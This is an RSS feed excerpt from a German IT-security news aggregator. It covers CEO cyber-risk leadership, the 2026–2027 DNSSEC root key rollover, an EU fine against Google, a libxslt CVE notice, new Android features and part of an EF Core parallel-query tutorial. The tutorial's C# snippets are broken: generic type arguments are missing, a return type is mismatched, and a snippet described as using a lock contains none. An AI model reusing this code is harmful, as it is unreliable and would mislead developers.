<p class="wp-block-paragraph">Executives believe they understand the level of cyber risk they face because they receive regular reports. Those reports often measure activity rather than resilience.</p>



<p class="wp-block-paragraph">Governance committees end up debating around another percentage point of phishing awareness or vulnerability remediation, while fundamental issues remain unaddressed in the background.</p>



<h2 class="wp-block-heading">2. Organizational inertia, and the need for executive structure to evolve faster</h2>



<p class="wp-block-paragraph">Cyber criminals continue to evolve rapidly. Large organizations generally do not.</p>



<p class="wp-block-paragraph">This is the second issue that should concern every CEO.</p>



<p class="wp-block-paragraph">Throughout my career, I have observed organizations repeatedly responding to new cyber threats by adding another technology platform, another monitoring capability, another compliance framework or another governance committee.</p>



<p class="wp-block-paragraph">Very rarely do they stop to redesign how cybersecurity operates.</p>



<p class="wp-block-paragraph">The result is what I described several years ago as the “<a href="https://www.amazon.com/Cybersecurity-Spiral-Failure-How-Break/dp/1637353057/">Cybersecurity Spiral of Failure</a>”.</p>



<ul class="wp-block-list">
<li>As complexity and regulation increase, organizations invest in more security products.</li>



<li>More products create more complexity.</li>



<li>More products and greater complexity generate more alerts.</li>



<li>More alerts require more analysts.</li>



<li>More analysts produce more reports.</li>



<li>More reports continue to build up executive confidence.</li>



<li>Meanwhile, the underlying structural weaknesses remain largely unchanged, technical debt piles up and costs escalate.</li>
</ul>



<p class="wp-block-paragraph">And when the inevitable breach eventually happens, reality reveals itself, but distrust also sets in between senior executives and security teams.</p>



<p class="wp-block-paragraph">This is not a funding problem. Nor is it a skills problem. It is fundamentally an operating model problem.</p>



<p class="wp-block-paragraph">Many organizations continue trying to solve twenty-first century challenges using governance, accountability, organizational and reporting structures designed twenty-five years ago.</p>



<p class="wp-block-paragraph">The cybersecurity function itself has evolved dramatically. Many executive structures have not.</p>



<p class="wp-block-paragraph">This organizational inertia extends beyond technology: It affects budgeting cycles, <a href="https://www.cio.com/article/4193990/reallocating-cybersecurity-capital-in-the-mythos-era.html">investment priorities</a>, procurement processes, accountability models and decision-making speed.</p>



<p class="wp-block-paragraph">Cyber attackers innovate every day. Organizational change often takes years.</p>



<p class="wp-block-paragraph">That imbalance should worry every CEO.</p>



<h2 class="wp-block-heading">3. Accelerating technological disruption, and how it challenges organizations in areas where they are intrinsically weak</h2>



<p class="wp-block-paragraph">The third issue is potentially the most significant over the coming decade.</p>



<ul class="wp-block-list">
<li>Artificial intelligence, autonomous agents and machine identities</li>



<li>Software supply chain complexity.</li>



<li>Quantum computing, and post-quantum cryptography</li>
</ul>



<p class="wp-block-paragraph">Each of these developments represents far more than another technical trend.</p>



<p class="wp-block-paragraph">Together, they fundamentally change the dynamics of cybersecurity.</p>



<p class="wp-block-paragraph">Artificial intelligence is transforming countless business processes. At the same time, it is also increasing both the speed and sophistication of cyber-attacks while simultaneously transforming defensive capabilities.</p>



<p class="wp-block-paragraph">Organizations have become increasingly dependent on software ecosystems that extend far beyond their own direct control. Engaging with the supply chain in ways that lead to a genuine appreciation of the risks involved has become a key challenge for most cybersecurity practices.</p>



<p class="wp-block-paragraph">Quantum computing may eventually invalidate much of today’s cryptographic algorithms, forcing organizations into one of the largest technology efforts since Y2K — but without the benefit of a fixed deadline and faced by a problem that is considerably more complex and hyperconnected IT estates that have little to do with those of the late 90s.</p>



<p class="wp-block-paragraph">None of these challenges can be solved overnight: They require clear governance, sustained investment over a few years and cross-functional organizational coordination.</p>



<p class="wp-block-paragraph">Most large organizations are weak on those three fronts: This is precisely why CEOs should be focusing on them now.</p>



<p class="wp-block-paragraph">Waiting until some of those risks become obvious will almost certainly be too late.</p>



<p class="wp-block-paragraph">Businesses naturally prioritise immediate commercial pressures. Cybersecurity often involves preparing for risks whose timing remains uncertain.</p>



<p class="wp-block-paragraph">But one of the greatest leadership failures I keep seeing remains the inability of organizations to act decisively on known unknowns.</p>



<p class="wp-block-paragraph">That tension explains why many organizations delay action until external events force them to respond. Unfortunately, cybersecurity rarely rewards late action.</p>



<h2 class="wp-block-heading">Leadership will determine who succeeds</h2>



<p class="wp-block-paragraph">Cybersecurity discussions still frequently focus on technology. I believe they should focus far more on leadership.</p>



<p class="wp-block-paragraph">Technology will continue evolving. Threat actors will continue adapting. Regulations will continue expanding. Those developments are inevitable.</p>



<p class="wp-block-paragraph">What remains within the control of every CEO is how their organization responds.</p>



<p class="wp-block-paragraph">Does cybersecurity remain an IT issue? Or is it recognised as an integral part of business resilience?</p>



<p class="wp-block-paragraph">How is cybersecurity accountability assigned at executive level? Or does it still rest largely with a CISO hidden in the organization?</p>



<p class="wp-block-paragraph">Does the board spend sufficient time discussing resilience? Or does cybersecurity appear only when approving budgets or reviewing incidents?</p>



<p class="wp-block-paragraph">These questions will increasingly determine organizational success.</p>



<p class="wp-block-paragraph">The companies that navigate the next decade successfully will not necessarily be those spending the most on cybersecurity. Nor will they be those deploying the latest security technologies first.</p>



<p class="wp-block-paragraph">They will be the organizations whose leadership recognises that cybersecurity has become a permanent business capability — embedded into governance, strategy, operational decision-making and organizational culture.</p>



<p class="wp-block-paragraph">That transformation cannot be delegated. It begins with the CEO.</p>



<p class="wp-block-paragraph">And perhaps that is the single biggest issue that should keep every chief executive awake at night: Not when the next cyber-attack will happen, but whether their organization is evolving quickly enough on those matters to meet a threat landscape that is changing much faster than the business itself.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CIOs beware: DNS KSK rollover could kick off wave of mysterious outages]]></title>
<description><![CDATA[Predicting an outage is tricky business, but CIOs might want to circle Oct. 11, 2026, through Jan. 11, 2027, for likely trouble of a potentially widespread and puzzling nature.



That’s because a relatively trivial update to DNSSEC on Oct. 11, one that will take full effect by Jan. 11, is likely...]]></description>
<link>https://tsecurity.de/de/3691225/it-security-nachrichten/cios-beware-dns-ksk-rollover-could-kick-off-wave-of-mysterious-outages/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691225/it-security-nachrichten/cios-beware-dns-ksk-rollover-could-kick-off-wave-of-mysterious-outages/</guid>
<pubDate>Fri, 24 Jul 2026 12:09:00 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Predicting an outage is tricky business, but CIOs might want to circle Oct. 11, 2026, through Jan. 11, 2027, for likely trouble of a potentially widespread and puzzling nature.</p>



<p class="wp-block-paragraph">That’s because a relatively trivial update to DNSSEC on Oct. 11, one that will take full effect by Jan. 11, is likely to deliver a series of seemingly unrelated system outages. This will come from oceans of dependencies from third-party, shadow, agentic, gen AI, SaaS, homegrown, and legacy apps — among many other quiet executable hiding spots, including virtual environments and containers.</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/joshithak/">Sai Joshitha Kathari</a>, senior site reliability engineer at payment card giant Visa, says most enterprises have far more DNS-related exposure than they realize because of these many dependencies.</p>



<p class="wp-block-paragraph">“This has the potential to create real downstream destruction when unresolved failures sit underneath important business functions,” Kathari says. </p>



<p class="wp-block-paragraph">The danger is that so many of these issues are either unknown to IT or handled by a third-party vendor and no one in IT has had reason to ask those vendors about DNS updates. </p>



<p class="wp-block-paragraph">“The risky areas are usually not the obvious managed DNS services. They are the older internal applications, hardcoded resolvers, containerized workloads, sidecar configurations, custom scripts, partner integrations, VM images, stale base images, and service-to-service dependencies that nobody has touched in a long time,” Kathari explains. “These systems can keep working quietly for years, then fail during a DNS or certificate-related change because they bypassed the normal platform standards.”</p>



<p class="wp-block-paragraph">Independent technology analyst <a href="https://www.linkedin.com/in/carmi/">Carmi Levy</a> says that CIOs need to take this event very seriously. </p>



<p class="wp-block-paragraph">“The two-pronged deadline — October 11, 2026, when the new Key Signing Key (KSK) begins signing the root zone, and January 11, 2027, when the old key is retired — should be marked in red on everyone’s calendar, just as December 31, 1999, once was,” Levy says. “Failure to comply could result in websites, critical business applications, and related resources dropping off the face of the Earth once the transition is complete.”</p>



<p class="wp-block-paragraph">Levy adds: “Custom-built code that lives outside conventional support mechanisms may or may not function when the DNS changes go into effect.”</p>



<p class="wp-block-paragraph">The <a href="https://www.icann.org/resources/press-material/release-2026-05-20-en">DNSSEC update itself</a> is straightforward, but it is also the first significant DNSSEC change — specifically a change in the trust anchor — since 2018. </p>



<p class="wp-block-paragraph">The rollout statement noted that “the trust anchor is formally known as the Domain Name System Security Extensions (DNSSEC) root zone Key Signing Key (KSK). The KSK is the cryptographic key at the core of the DNSSEC trust anchor and is used to verify that DNS responses are legitimate and have not been modified in transit.”</p>



<h2 class="wp-block-heading">Expect nearly every enterprise to be impacted</h2>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/kimdavies/">Kim Davies</a>, vice president of IANA Services and president of public technical identifiers at ICANN, says the extent of the impact on enterprises is unknowable, given the nature of shadow IT and other edge cases. </p>



<p class="wp-block-paragraph">But based on the massive number of dependencies both known and unknown in the typical global enterprise, Davies guesses that just about every enterprise will be impacted, to varying degrees. </p>



<p class="wp-block-paragraph">“In highly complex organizations, it is very likely there will be some impact in the corners, in the margins, of the organization,” Davies tells CIO. “DNS is such a core technology that underpins everything.”</p>



<p class="wp-block-paragraph">As the updates propagate, hiccups will materialize, Davies notes. “When the system cannot validate the [DNS] information, it will treat it as suspect and DNS lookups will fail.”</p>



<p class="wp-block-paragraph">Visa’s Kathari says, “Enterprises should expect some secondary DNS-related glitches when major DNSSEC-related changes happen, not necessarily because the core infrastructure teams will ignore the update, but because large environments have many hidden dependency paths.”</p>



<p class="wp-block-paragraph">Making this problem far worse, Kathari notes, is that the glitches will likely initially look like anything other thana DNS glitch. That will force IT staff to waste a vast number of hours chasing causes that ultimately prove to be unrelated to the incidents. </p>



<p class="wp-block-paragraph">“The impact for CIOs is that DNS failures rarely announce themselves as DNS failures. They look like application timeouts, broken logins, failed API calls, queue lag, payment failures, partner connectivity issues, or random regional instability,” Kathari explains. “That makes troubleshooting slower because teams may spend hours looking at the application, database, network, or cloud provider before realizing name resolution is part of the failure path.”</p>



<p class="wp-block-paragraph"><a href="https://greyhoundresearch.com/svg/">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research, agrees that IT will likely spin its wheels chasing the wrong ghosts.</p>



<p class="wp-block-paragraph">“A validation failure rarely stays in its lane. It surfaces as an application error, an API timeout, or a reachability problem, which turns a resolver fault into a coordination failure,” Gogia says. “The application team blames the network, the network team blames the cloud, and the user simply watches work stop.”</p>



<p class="wp-block-paragraph">“Images and templates are the frontier most teams miss,” Gogia adds. “A resolver fixed in summer can be broken again in October the instant a stale golden image is redeployed, because automation no longer lets configuration drift slowly. It restores yesterday’s assumptions at machine speed.”</p>



<p class="wp-block-paragraph">It is widely expected that enterprises will not have any problems executing the change or, more likely, relying on their hyperscalers to properly handle the change. That is the concern. </p>



<p class="wp-block-paragraph">“CIOs are being distracted so much with AI and this is such a deep in the weeds infrastructure issue that this can and willcatch people off-guard,” <a href="https://acceligence.com/talent/profiles/justin-greis/">Justin Greis</a>, CEO of consulting firm Acceligence, tells CIO. “I think we’ll see a meaningful number of enterprise disruptions associated with the DNSSEC trust anchor rollover. Not because the update itself is especially difficult, but because it will expose weaknesses that already exist inside many organizations.”</p>



<p class="wp-block-paragraph">Most enterprise IT operations have had no reason to compile a comprehensive list of all DNS dependencies, but many will be instantly discovered in January. </p>



<h2 class="wp-block-heading">Potentially widespread fallout</h2>



<p class="wp-block-paragraph">A major retailer, for example, might suddenly be unable to connect with FedEx to arrange for deliveries or a hospital may find that test results are no longer being shared with patient portals. It might manifest as an assembly line that halts because an IIoT component can no longer share files with its vendor system or a truck fleet that stops being tracked. </p>



<p class="wp-block-paragraph">“There will almost certainly be systems that fall through the cracks. Some will be legacy applications that rely on outdated DNS configurations that have not been updated in years,” Greis says. “Others will be business-unit-developed tools, contractor-built solutions, embedded systems, manufacturing and industrial systems, or highly customized workloads that operate outside normal IT oversight. These are the types of systems that often surface during infrastructure events like this.”</p>



<p class="wp-block-paragraph">Greis adds that many enterprises will discover in January problems created by their own automation.</p>



<p class="wp-block-paragraph">“Over time, enterprises build layers of processes, templates, and deployment mechanisms that are reused across teams and environments,” Greis notes. “Even after DNS infrastructure is updated correctly, older settings can inadvertently be reintroduced through routine updates and system changes, creating intermittent and difficult-to-diagnose failures.”</p>



<p class="wp-block-paragraph">The good news from this situation is that enterprises are not going to likely lose all DNS access if any of these glitches occur. But that may be of no comfort because even if the disruptions are only with small edge cases, that can still cause massive operational disruptions.</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/cricketliu/">Cricket Liu</a>, EVP and chief evangelist at Infoblox, gives the example of a DNS server that responds to factory-floor system queries.</p>



<p class="wp-block-paragraph">“Or let’s say this disrupts [an enterprise’s key] SaaS application. All name resolution may stop and it will show a server failure. It will not deliver a response whenever I look anything up. That’s not subtle at all,” Liu says. “It’s highly likely that companies are going to see some effects.”</p>



<p class="wp-block-paragraph">Back in 2017, the switchover was relatively uneventful, giving some CIOs hope that January 2027 will also be a non-event. But given the technology advancements in the last 10 years and the resulting tidal wave of new enterprise tech dependencies, few are realistically expecting no problems this go around. </p>



<h2 class="wp-block-heading">Impossible to predict what will happen</h2>



<p class="wp-block-paragraph">One of the top network experts on DNS effects in enterprises is <a href="https://blog.apnic.net/author/geoff-huston/">Geoff Huston</a>, chief scientist at the Asia Pacific Network Information Centre (APNIC), the regional Internet Registry administering IP addresses for the Asia Pacific region.</p>



<p class="wp-block-paragraph">Huston says it is difficult to project what will happen in January until it happens.</p>



<p class="wp-block-paragraph">“Just like the last time, we are flying blind with this key roll. Because nothing really terrible happened last time, there is some confidence that nothing terrible will happen this time, but we just can’t tell in advance as there are no good measurement approaches that allow us to peek inside the trust state of recursive resolvers,” he says.</p>



<p class="wp-block-paragraph">As for potential edge-case glitches, Huston says it is possible, but if third-party vendors do not properly handle the update, there will be other issues as well, as the KSK cryptographic key used within DNSSEC signs and validates the keys that protect DNS records. </p>



<p class="wp-block-paragraph">“If it is not standards-compliant, then you have more problems than just the KSK roll,” Huston says, “as it raises the obvious question of ‘What else is not correctly implemented in the DNS resolver that I’m running?’”</p>



<p class="wp-block-paragraph">As a silver lining, Acceligence’s Greis says any hiccups that result from the DNS KSK update may be a gift in disguise for CIOs. </p>



<p class="wp-block-paragraph">“The irony is that some of the most business-critical components in the technology stack are often the least visible because they work in the background,” Greis says. January “may reveal how much modern business resilience depends on infrastructure that many organizations rarely examine until something breaks. For CIOs, that’s the real lesson. This is not fundamentally a story about a DNS update. It is a story about operational visibility, resilience, and governance. Organizations that treat the rollover as a routine infrastructure task will likely complete the update and move on. Organizations that use it as an opportunity to understand and strengthen the foundations of their technology environment may gain far more value than simply avoiding an outage.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google fined $1 billion for anticompetitive search and mobile app practices in EU]]></title>
<description><![CDATA[The European Commission has fined Google a total of €890 million ($1 billion) for its breaches of the Digital Market Act (DMA).



Just over half the fine — €460 million — was because Google illegally gave preference to its own services in Google Search results.



The remainder was because in th...]]></description>
<link>https://tsecurity.de/de/3691182/it-nachrichten/google-fined-1-billion-for-anticompetitive-search-and-mobile-app-practices-in-eu/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691182/it-nachrichten/google-fined-1-billion-for-anticompetitive-search-and-mobile-app-practices-in-eu/</guid>
<pubDate>Fri, 24 Jul 2026 11:49:13 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">The European Commission has fined Google a total of €890 million ($1 billion) for its breaches of the Digital Market Act (DMA).</p>



<p class="wp-block-paragraph">Just over half the fine — €460 million — was because Google illegally gave preference to its own services in Google Search results.</p>



<p class="wp-block-paragraph">The remainder was because in the Google Play store for Android apps, the company prevented app developers from leading consumers to alternative, often cheaper, purchase channels. Under the DMA, app developers who distribute their apps via Google Play or Apple’s App Store should be able to inform customers of alternative offers.</p>



<p class="wp-block-paragraph">Now Google must give third-party services featuring in its results the same treatment as its own services, and allow developers of apps in the Play Store to communicate about offers both in and outside the Play Store, or face further fines.</p>



<p class="wp-block-paragraph">The Commission first <a href="https://ec.europa.eu/commission/presscorner/detail/en/ip_25_811" target="_blank" rel="noreferrer noopener">raised these issues with Google in March 2025</a>. In April of this year, <a href="https://www.computerworld.com/article/4159968/google-should-share-search-data-to-break-its-monopoly-european-commission-suggests.html">the Commission laid out</a> plans as to how Google should allow other third-parties to share its searches, suggestions that the tech firm firmly resisted. Earlier this month, the Commission also said <a href="https://www.computerworld.com/article/4198420/google-must-open-android-to-rival-ai-agents-eu-orders.html"> Android should be open to other AI agents</a> and not limited to Google’s own Gemini.</p>



<p class="wp-block-paragraph">Google is not the only US company to have fallen foul of the DMA. In April 2025, <a href="https://www.macworld.com/article/2762151/eu-fines-apple-e500m-570m-for-violations-of-the-digital-markets-act.html">Apple was fined €500 million</a> for breaching the Act and, last month, <a href="https://www.computerworld.com/article/4190069/eu-microsoft-and-amazons-cloud-services-should-probably-be-classified-as-gatekeepers.html">the Commission fired the first shots at cloud hyperscalers</a> Microsoft and Amazon.</p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-10911 | Red Hat Enterprise Linux/OpenShift Container Platform libxslt expired pointer dereference (Nessus ID 266126 / WID-SEC-2026-1287)]]></title>
<description><![CDATA[A vulnerability described as problematic has been identified in Red Hat Enterprise Linux and OpenShift Container Platform. Affected by this issue is some unknown functionality of the component libxslt. Executing a manipulation can lead to expired pointer dereference.

This vulnerability is handle...]]></description>
<link>https://tsecurity.de/de/3691133/sicherheitsluecken/cve-2025-10911-red-hat-enterprise-linuxopenshift-container-platform-libxslt-expired-pointer-dereference-nessus-id-266126-wid-sec-2026-1287/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691133/sicherheitsluecken/cve-2025-10911-red-hat-enterprise-linuxopenshift-container-platform-libxslt-expired-pointer-dereference-nessus-id-266126-wid-sec-2026-1287/</guid>
<pubDate>Fri, 24 Jul 2026 11:35:05 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability described as <a href="https://vuldb.com/kb/risk">problematic</a> has been identified in <a href="https://vuldb.com/product/red_hat:enterprise_linux">Red Hat Enterprise Linux and OpenShift Container Platform</a>. Affected by this issue is some unknown functionality of the component <em>libxslt</em>. Executing a manipulation can lead to expired pointer dereference.

This vulnerability is handled as <a href="https://vuldb.com/cve/CVE-2025-10911">CVE-2025-10911</a>. The attack can be executed remotely. There is not any exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Android: Neue Funktionen im Juli 2026 – ein Überblick]]></title>
<description><![CDATA[Google ist aktuell dabei, ein neues Google-Play-System-Update auszurollen. Damit erhalten Android-Nutzer monatlich neue Funktionen, die einen direkten Einfluss auf ihr Smartphone haben (unabhängig vom Hersteller).



Die Seite 9to5Google hat die wichtigsten Neuerungen zusammengefasst. Demnach bek...]]></description>
<link>https://tsecurity.de/de/3691100/it-nachrichten/android-neue-funktionen-im-juli-2026-ein-ueberblick/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691100/it-nachrichten/android-neue-funktionen-im-juli-2026-ein-ueberblick/</guid>
<pubDate>Fri, 24 Jul 2026 11:19:09 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Google ist aktuell dabei, ein neues Google-Play-System-Update auszurollen. Damit erhalten Android-Nutzer monatlich neue Funktionen, die einen direkten Einfluss auf ihr <a href="https://www.pcwelt.de/article/1924183/das-beste-smartphone-im-test.html" target="_blank" rel="noreferrer noopener">Smartphone </a>haben (unabhängig vom Hersteller).</p>



<p>Die Seite <a href="https://9to5google.com/2026/07/09/android-documents-backup/" target="_blank" rel="noreferrer noopener">9to5Google</a> hat die wichtigsten Neuerungen zusammengefasst. Demnach bekommen Android-Nutzer die Option, die Sicherung von SMS-, MMS- und RCS-Nachrichten direkt zu steuern. Das ähnelt der <a href="https://www.pcwelt.de/article/3181692/alle-android-nutzer-bekommen-nun-diese-wichtige-backupfunktion.html" target="_blank" rel="noreferrer noopener">separaten Backup-Einstellung für ausgewählte Apps</a>, die wir Ihnen letzte Woche vorgestellt hatten.</p>



<p>Über <strong>Einstellungen &gt; Konten und Sicherung &gt; Google-Sicherung &gt; Weitere Gerätedaten</strong> gibt es nach Erhalt des Updates einen neuen Ein-/Aus-Schalter für SMS- und MMS-Nachrichten, Anrufverlauf und Geräteeinstellungen. Sie haben also deutlich mehr Kontrolle darüber, welche Daten Sie über die Google-Cloud speichern wollen.</p>



<p>Das ist auch besonders wichtig, da Google seit Neuestem <a href="https://www.pcwelt.de/article/3185747/google-erlaubt-android-nutzern-ab-sofort-kein-kostenloses-backup-mehr-speicherplatz-angererechnet.html" target="_blank" rel="noreferrer noopener">keine Gratis-Backups für Android-Geräte mehr erlaubt</a>. Jedes Backup Ihres Smartphones zählt also direkt auf Ihr verfügbares Speicherkontingent ein, das in der Gratis-Variante gerade einmal 15 GB sind.</p>



<p>Zusätzlich führt Android nun die lokale Sicherung von Dokumenten ein. Damit können Sie Ihre heruntergeladenen Dokumente automatisch in Google Drive speichern, damit diese sicher und von jedem Ihrer Geräte aus zugänglich sind. Auf der Seite „Sicherung“ erscheint dann neben „Fotos &amp; Videos“ und „Sonstige Gerätedaten“ ein neues Menü namens „Dokumente“.</p>



<p>Google erklärt, dass zu den unterstützten Dateiformaten .DOC, .PPT, .XLS, .PDF “und alle anderen auf diesem Gerät gespeicherten Dokumente” gehören. Dokumente sollen bei der Übertragung zwischen Ihrem Gerät und den Google-Diensten verschlüsselt werden. Änderungen, die an den Dokumenten an einem Ort vorgenommen werden, werden nicht mit anderen Orten synchronisiert.</p>



<h3 class="wp-block-heading">Mehr Neuerungen</h3>



<p>In den <a href="https://support.google.com/product-documentation/answer/14343500?hl=de" target="_blank" rel="noreferrer noopener">Versionshinweisen zu den Google-Systemdiensten</a> finden sich noch mehr kleine Neuerungen, die jetzt an Android-Nutzer ausgerollt werden. Dazu gehören unter anderem die Überarbeitung von In-App-Käufen mithilfe einer “verbesserten, nativen Storefront für Google One”, die Übertragung von Arbeitsprofilen auf Wear-OS-Smartwatches, eine neue Google-Standortfreigabe für Chromebooks sowie „neue Funktionen für Entwickler von Google- und Drittanbieter-Apps zur Unterstützung von Prozessen in ihren Apps im Zusammenhang mit Google Maps”.</p>



<p>All diese neuen Funktionen werden seit dem 6. Juli an Android-Nutzer verteilt. Über <strong>Einstellungen</strong> <strong>&gt;</strong> <strong>Sicherheit und Datenschutz</strong> <strong>&gt;</strong> <strong>Updates</strong> <strong>&gt;</strong> <strong>Google Play-Systemupdate</strong> können Sie die aktuell installierte Version der Google Play System Updates prüfen und gegebenenfalls auf eine neue Version aktualisieren.</p>



<p><a href="https://www.pcwelt.de/article/3092158/android-17-diese-smartphones-bekommen-das-update-komplette-geraeteliste.html" target="_blank" rel="noreferrer noopener">Android 17: Diese Smartphones bekommen das Update</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[How to execute queries in parallel using EF Core]]></title>
<description><![CDATA[EF Core is Microsoft’s flagship ORM (object-relational mapper), the software layer that allows .NET developers to work with relational databases. The DbContext class is the core component of the EF Core framework for managing database operations. However, the DbContext class in EF Core is not thr...]]></description>
<link>https://tsecurity.de/de/3691080/ai-nachrichten/how-to-execute-queries-in-parallel-using-ef-core/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691080/ai-nachrichten/how-to-execute-queries-in-parallel-using-ef-core/</guid>
<pubDate>Fri, 24 Jul 2026 11:04:59 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">EF Core is Microsoft’s flagship ORM (object-relational mapper), the software layer that allows .NET developers to work with relational databases. The <code>DbContext</code> class is the core component of the EF Core framework for managing database operations. However, the <code>DbContext</code> class in EF Core is not thread-safe. Hence, if you share <code>DbContext</code> instances between multiple threads, you will often encounter data corruption issues and the <code>InvalidOperationException</code>.</p>



<p class="wp-block-paragraph">In this article, we’ll learn how we can execute queries in parallel in EF Core by handling thread-safety issues to avoid concurrency errors. To work with the code examples provided in this article, you should have Visual Studio 2026 installed in your system. You can <a href="https://visualstudio.microsoft.com/insiders/">download Visual Studio 2026 here</a>.</p>



<h2 class="wp-block-heading">Executing EF Core queries in parallel – the problem</h2>



<p class="wp-block-paragraph">When working in today’s data-driven applications, you will often need to fetch data from multiple unrelated datasets. In applications that use concurrency, thread-safety is critical to guaranteeing correct execution, avoiding data corruption and race conditions, and ensuring data consistency. Let’s understand this with an example. </p>



<p class="wp-block-paragraph">Let’s say we want to populate a dashboard that displays all recently processed orders, metrics, logs, and traces, as well as your application’s performance metadata. We might write the following code. </p>



<pre class="wp-block-code"><code>public class Dashboard
{
    public List Orders { get; set; } = new();
    public Metrics Metrics { get; set; } = new();
    public List Logs { get; set; } = new();
    public List Traces { get; set; } = new();
}
public static async Task LoadDashboardAsync(ProductService productService)
{
    Task&lt;List&gt;    ordersTask  = productService.GetProcessedOrdersAsync();
    Task        metricsTask = productService.GetMetricsAsync();
    Task&lt;List&gt; logsTask    = productService.GetRecentLogsAsync();
    Task&lt;List&gt;    tracesTask  = productService.GetTracesAsync();
    await Task.WhenAll(ordersTask, metricsTask, logsTask, tracesTask);
    return new Dashboard
    {
        Orders  = await ordersTask,
        Metrics = await metricsTask,
        Logs    = await logsTask,
        Traces  = await tracesTask
    };
}
</code></pre>



<p class="wp-block-paragraph">In the preceding code snippet, there are four read operations that are executed by four different <code>Task</code> instances. Our objective is to ensure that the database round trips run in parallel instead of in sequence. We can accomplish this by using<code>Task.WhenAll</code>, which starts the four tasks, waits for every task to finish, then returns the data wrapped inside a new <code>Dashboard</code> instance.</p>



<p class="wp-block-paragraph">If we executed these queries sequentially, the user would have to wait until each query completed its execution in turn—for a total wait time equal to the sum of the times for all four queries. However, by running these queries in parallel, we reduce the wait time considerably. The user will need to wait only as long as it takes for the slowest of the four queries to complete its execution.</p>



<p class="wp-block-paragraph">However, there is a danger with the above approach. If you run multiple operations on the same <code>DbContext</code> instance, you will see an <code>InvalidOperationException</code> with the following message:</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p class="wp-block-paragraph">A second operation started in this context before the previous operation was completed. This is usually caused by multiple threads using the same <code>DbContext</code> instance; instance members are not guaranteed to be thread-safe.</p>
</blockquote>



<p class="wp-block-paragraph">Databases such as SQL Server, PostgreSQL, and Oracle Database follow a request-response communication model at the connection level: a single connection can process only one command at a time. Hence, you cannot run multiple queries concurrently using the connection. If you <code>await</code> several operations using the same connection, EF Core detects the overlapping use of a non-thread-safe context and throws an <code>InvalidOperationException</code>. To run queries in parallel, you must give each task its own connection or context.</p>



<h2 class="wp-block-heading">Why DbContext isn’t thread-safe – and how to work around it</h2>



<p class="wp-block-paragraph">The <code>DbContext</code> class in EF Core is designed to manage a single unit of work. To be more precise, EF Core does not provide support for running multiple operations on the same <code>DbContext</code> instance. This design approach creates inherent challenges when you use the same <code>DbContext</code> instance across multiple threads. If <code>DbContext</code> were thread-safe, extensive locking would be required, which would degrade data access performance.</p>



<p class="wp-block-paragraph">This stateful design of <code>DbContext</code> makes it unsuitable for concurrent access patterns that involve loading, modifying, or tracking different sets of data simultaneously, because it needs to maintain the internal representation of database state.</p>



<p class="wp-block-paragraph">The <a href="https://learn.microsoft.com/en-us/ef/core/change-tracking/" data-type="link" data-id="https://learn.microsoft.com/en-us/ef/core/change-tracking/">change tracker</a> is one of the most important components of <code>DbContext</code> in EF Core. It monitors all entities loaded into memory and detects any changes made to them after they have been loaded. It keeps track of the original, current, and changed values of the entities, thereby enabling the EF Core runtime to know the current state of these entities when you call the <code>SaveChanges()</code> method on the <code>DbContext</code> instance.</p>



<p class="wp-block-paragraph">To implement thread-safety when working with DbContext, we must write our code to ensure that each concurrent operation gets its own copy of a short-lived instance. Now, we <em>could</em> accomplish this by wrapping a shared <code>DbContext</code> instance inside a thread-safe block using the <code>lock</code> keyword, so that all calls to the database take place using one and only one thread at a time. This approach is illustrated in the code snippet below. </p>



<pre class="wp-block-code"><code>using Microsoft.EntityFrameworkCore;
public class Product
{
    public int Id { get; set; }
    public string Name { get; set; } = string.Empty;
    public decimal Price { get; set; }
    public int Quantity { get; set; }
}
public class AppDbContext : DbContext
{
    public AppDbContext(DbContextOptions options) : base(options) { }
    public DbSet Products =&gt; Set();
}
</code></pre>



<p class="wp-block-paragraph">However, while the above approach gives us the thread-safety we need, it can degrade data access performance considerably. A better approach is to use <code>IDbContextFactory</code> , which creates fresh <code>DbContext</code> instances on demand. Calling its <code>CreateDbContext()</code> method is cheap and produces a fresh, isolated context every time. </p>



